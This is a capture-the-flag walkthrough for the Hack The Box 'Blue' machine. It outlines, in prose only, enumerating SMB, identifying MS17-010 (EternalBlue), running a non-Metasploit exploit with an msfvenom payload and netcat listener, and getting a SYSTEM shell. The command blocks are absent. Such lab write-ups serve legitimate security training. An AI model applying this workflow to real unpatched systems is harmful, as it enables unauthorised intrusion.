Hack The Box - Blue Walkthrough without Metasploit
Enumeration
To enumerate the box we will use the following nmap command:
As we can see we have the port 445 (SMB) open, it even disclose some important information Windows 7 professional 7601 Service Pack 1, lets run a new enumeration, this time with vulnerability scripts:
We will be using two flags:
--script: This flag will be used to apply "vuln" (vulnerability) scripts on the given ports of the box.
-p: will scan only the ports listed, in our case 445 since its the only one we are currently interested on.
Something really interesting catch our eye, CVE-2017-0143 (MS17-010), with a quick google search...
Finding the Vulnerability
Eternal Blue exploit, with lots of Metasploit modules.. but we will not fall into the temptation of using MSF (which is a really usefull tool but not our goal here).
Non Metasploit exploit
If we search "a bit more" we will find this excellent github repository:
Let's clone this repository:
There are several scripts in the folder, the first one we will use is eternal_checker.py to confirm it is vulnerable:
Exploitation
Generate a Payload
Now we navigate to shellcode folder in order to generate our payload, this will be done in two steps:
And now our msfvenom payload:
Now we have to mix them together:
Executing the Exploit
First of all we need a netcat listener:
Now we need to decide which python script to use, with our previous enumeration we have discovered that the target OS is Windows 7
Now in order to use the exploit we need some parameters, the victim ip, the mixed payload, and the numGroomConn:
This attempt failed, now we have to change the number of groom connection until we find a valid one, we can go increasing the value until that.
Pwnd
After some tries increasing the number of groom connections we were able to get a shell as NT Authority
Last updated
